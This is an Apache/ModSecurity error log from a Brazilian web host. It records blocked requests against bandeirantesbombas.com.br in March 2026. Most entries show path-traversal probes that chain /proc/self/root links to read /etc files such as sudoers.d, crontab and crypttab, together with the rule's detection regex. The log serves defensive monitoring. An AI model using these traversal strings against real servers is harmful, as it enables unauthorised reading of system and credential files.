[Wed Mar 18 15:34:44.597694 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.228.61:52430] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrwRAbLMZ6AikZjR9XyOgAAABA"]
[Wed Mar 18 15:34:44.810127 2026] [:error] [pid 11816:tid 140411658000128] [client 216.73.216.191:42832] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwROw_le52K8_3pV0PaQAAAgo"]
[Wed Mar 18 15:34:45.975322 2026] [:error] [pid 26799:tid 140411733534464] [client 216.73.216.191:41253] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwRda6ubjKNq_cu4bQpQAAA0E"]
[Wed Mar 18 15:35:07.643544 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:43454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwW9a6ubjKNq_cu4bQvgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:35:09.801267 2026] [:error] [pid 29882:tid 140411716749056] [client 216.73.216.191:62903] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwXEzinOy1jxa1j4dQJQAAAQM"]
[Wed Mar 18 15:35:16.818153 2026] [:error] [pid 29882:tid 140411658000128] [client 216.73.216.191:53277] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwZEzinOy1jxa1j4dQKwAAAQo"]
[Wed Mar 18 15:35:16.821643 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:46170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwZOyqAr6etmhZHNr8YQAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 15:35:28.241356 2026] [mime_magic:error] [pid 31803:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:18073] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:35:36.270200 2026] [:error] [pid 17887:tid 140411590858496] [client 216.73.216.191:63842] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrweAkwaGbbGflqUZBGPgAAANI"]
[Wed Mar 18 15:35:36.418581 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:38944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrweMdf6f5d65gmYZQItgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:35:36.767097 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:34400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrweOyqAr6etmhZHNr8igAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:35:38.858184 2026] [:error] [pid 11816:tid 140411599251200] [client 216.73.216.191:28939] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrweuw_le52K8_3pV0PrQAAAhE"]
[Wed Mar 18 15:35:39.990979 2026] [:error] [pid 14269:tid 140411574073088] [client 216.73.216.191:59699] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwewbLMZ6AikZjR9XyeQAAABQ"]
[Wed Mar 18 15:35:46.855057 2026] [:error] [pid 30077:tid 140411716749056] [client 216.73.216.191:54933] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwgvu8EFLIOrSqIps0EQAAAkM"]
[Wed Mar 18 15:35:54.503739 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:55132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwisdf6f5d65gmYZQIygAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:36:01.929806 2026] [mime_magic:error] [pid 29882:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:37752] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:36:10.238042 2026] [mime_magic:error] [pid 26799:tid 140411599251200] (70014)End of file found: [client 74.7.241.31:38644] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware/vx
[Wed Mar 18 15:36:17.473655 2026] [:error] [pid 31803:tid 140411565680384] [client 216.73.216.191:18629] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwoOyqAr6etmhZHNr8ogAAAFU"]
[Wed Mar 18 15:36:18.571157 2026] [:error] [pid 30077:tid 140411683178240] [client 216.73.216.191:9096] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwovu8EFLIOrSqIps0XAAAAkc"]
[Wed Mar 18 15:36:20.761789 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:22168] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:36:30.703373 2026] [:error] [pid 15051:tid 140411641214720] [client 216.73.216.191:7294] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwrimAPhZkrhU8w4meUgAAAIw"]
[Wed Mar 18 15:36:33.539428 2026] [:error] [pid 17887:tid 140411574073088] [client 216.73.216.191:21914] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwsQkwaGbbGflqUZBGfgAAANQ"]
[Wed Mar 18 15:36:38.506845 2026] [:error] [pid 14269:tid 140411733534464] [client 216.73.216.191:49480] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwtgbLMZ6AikZjR9XysAAAAAE"]
[Wed Mar 18 15:36:43.364386 2026] [:error] [pid 14269:tid 140411708356352] [client 216.73.216.191:31447] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwuwbLMZ6AikZjR9XywgAAAAQ"]
[Wed Mar 18 15:36:45.623055 2026] [:error] [pid 17653:tid 140411733534464] [client 216.73.216.191:60670] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwvcdf6f5d65gmYZQI9gAAAsE"]
[Wed Mar 18 15:36:53.191588 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:36966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwxeoXxyEfFpUF8f-paQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:36:55.398174 2026] [:error] [pid 14269:tid 140411733534464] [client 216.73.216.191:52432] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwxwbLMZ6AikZjR9XyzAAAAAE"]
[Wed Mar 18 15:36:57.572608 2026] [:error] [pid 29882:tid 140411733534464] [client 216.73.216.191:17986] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwyEzinOy1jxa1j4dQuwAAAQE"]
[Wed Mar 18 15:37:04.697038 2026] [:error] [pid 17653:tid 140411548894976] [client 216.73.216.191:32177] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwzsdf6f5d65gmYZQJFAAAAtc"]
[Wed Mar 18 15:37:15.256417 2026] [:error] [pid 31803:tid 140411548894976] [client 216.73.216.191:42574] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw2-yqAr6etmhZHNr86gAAAFc"]
